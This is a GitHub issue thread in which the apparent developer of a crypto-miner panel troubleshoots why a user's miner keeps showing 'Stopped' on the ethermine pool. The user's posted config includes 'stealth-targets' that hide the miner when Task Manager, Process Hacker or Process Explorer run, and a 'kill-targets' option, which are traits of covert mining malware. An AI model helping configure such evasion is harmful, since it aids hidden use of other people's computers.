### ISSUE TITLE
never stops saying 'stopped'

### ISSUE THREAD

**Issue by pancak3boy** [UnamSanctam/UnamWebPanel#95]
idk if it just doesnt start mining or the site is broken

**Comment by UnamSanctam** [comment]
That means that the miner can't connect to the pool. Make sure that the settings are correct and that the pool is reachable.

**Comment by pancak3boy** [comment]
idk I use ethermine is that not supported?

**Comment by UnamSanctam** [comment]
All pools should be supported, most people here use ethermine. Can you post the settings you use?

**Comment by pancak3boy** [comment]
ETHASH as algorithm
![image](https://user-images.githubusercontent.com/82325516/160431756-a6bd331a-b50e-4b47-9855-1c54ff40bb3d.png)
![image](https://user-images.githubusercontent.com/82325516/160431814-86cc848c-8e4c-4a7c-9f7a-8e841921ead0.png)


{
    "url": "stratum://`0x1EE77fFF7bA95a4dc9dEc1c86389946aBDbFA1DA`@eu1.ethermine.org:4444",
    "algo": "ethash",
    "max-gpu": 20,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}

**Comment by UnamSanctam** [comment]
That should work fine, and the miner isn't running in any of the countries ethermine blocked? I think they blocked Russia, Belarus, Afghanistan, Cambodia, Iran, Iraq , North Korea, Syria, and Pakistan from using ethermine, not sure if they block IPs from mining but they said that they've suspended operation in those countries.

**Comment by pancak3boy** [comment]
as test

**Comment by UnamSanctam** [comment]
Hmm yeah then it should work, can you run the checker that gets built with the miner and post what it displays (should show a miner running)?

**Comment by pancak3boy** [comment]
Not run as Administrator, only non-administrator miners can be searched for.
Watchdog Running: No
Miners:
--cinit-algo=ethash --pool=stratum://`0x1EE77fFF7bA95a4dc9dEc1c86389946aBDbFA1DA`@eu1.ethermine.org:4444  --cinit-max-gpu=20 --cinit-api="shhhhh" --cinit-idle-wait=5 --cinit-idle-gpu=100
GPUs:
 NVIDIA GeForce GTX 950M
 Intel(R) HD Graphics 530
Compatible GPU found: True

**Comment by UnamSanctam** [comment]
Yes those settings work fine, you should be getting "Out of free VRAM" as a status (since you only have a GTX 950M) and not "Stopped", if you are getting "Stopped" then most likely your IP could be blocked from ethermine (not sure why though), Can you try running a normal ETH miner like maybe T-Rex or nbminer or something and see if ethermine works with them?

**Comment by pancak3boy** [comment]
ok

**Comment by pancak3boy** [comment]
oof idk
